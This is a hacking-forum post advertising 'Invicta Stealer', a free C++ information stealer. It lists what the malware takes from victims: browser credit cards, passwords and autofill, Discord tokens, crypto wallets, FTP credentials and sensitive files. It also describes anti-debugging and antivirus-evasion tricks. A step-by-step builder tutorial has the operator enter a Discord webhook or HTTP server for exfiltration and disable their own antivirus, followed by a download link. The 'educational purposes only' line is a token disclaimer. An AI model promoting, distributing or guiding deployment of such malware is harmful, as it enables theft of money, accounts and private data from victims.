⚔️Invicta Stealer — a powerful, free native stealer⚔️ | Hacking Tools | Crax

Welcome To Crax.Pro Forum!

Check our new Marketplace at Crax.Shop

   Login! SignUp Now!
  • We are in solidarity with our brothers and sisters in Palestine. Free Palestine. To learn more visit this Page

  • Crax.Pro domain has been taken down!

    Alternatives: Craxpro.io | Craxpro.com

⚔️Invicta Stealer — a powerful, free native stealer⚔️

⚔️Invicta Stealer — a powerful, free native stealer⚔️

LV
0
 

simplybrin

Member
Joined
Mar 8, 2023
Threads
1
Likes
0
Awards
1
Credits
220©
Cash
0$
⚔️Invicta Stealer — a powerful, free native stealer⚔️

This is a C++ stealer which is being actively improved upon, with the help we receive from our active community.

NOTE: THIS IS FOR EDUCATIONAL PURPOSES ONLY. YOU MAY NOT USE THIS FOR MALICIOUS PURPOSES.

📁 BROWSERS
Information is obtained from all the profiles from all chromium-based (the most used) browsers, and firefox.
We collect: credit card data, autofill, history, all extensions which include 40+ crypto wallets and various authenticators, local storage, downloads, and much more. Essentially, all the information is collected.

📁 DISCORD
All of the discord tokens are extracted from: the regular client, discord canary, ptb discord and browser local storage

📁 CRYPTO
Wallet information is collected from 25 wallets, with new ones being actively added.

📁 SENSITIVE DIRECTORIES AND FILES
We have studied real world scenarios, and came up with advanced filters that will fetch you sensitive information related to cryptocurrency wallets, bank accounts, passwords, private keys, etc.
The stealer gets recently opened .txt files, recursively iterates through the computer to find sensitive information, steals github and visual studio code repositories (with bloat removed), gets .txt files from desktop, documents, etc

📁 FTP CLIENTS
Information is obtained from WinSCP and FileZilla

📁 SYSTEM INFORMATION
We collect system information, which includes the HWID, IP, timezone, computer language, RAM, CPU information, etc

📁 ANTI-DEBUGGING, EVASION TECHNIQUES
We use anti-debug/anti-virustotal/anti-vm techniques which complicate analysis of the malware. Your link will be encrypted in the stealer file.
Sensitive operations are performed through syscalls, which make them harder to detect by AVs and analysts, and all strings are encrypted.

TUTORIAL

1. Download the Builder ZIP file
2. Run Builder.exe
3. Input discord webhook, or an URL to your HTTP server into the box
4. Click build
5. Patched stealer will be available in out/InvictaStealer.exe

You have to turn your antivirus off while doing this, because the AV might flag this as it patches the malicious file

Contact us on our telegram channel if you need help or have suggestions. We strive to be the best.


Download link: https://github.com/simplybrin/Invicta-Stealer
 

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Log in

Already have an account? Log in here.

Tips
Tips
Top Bottom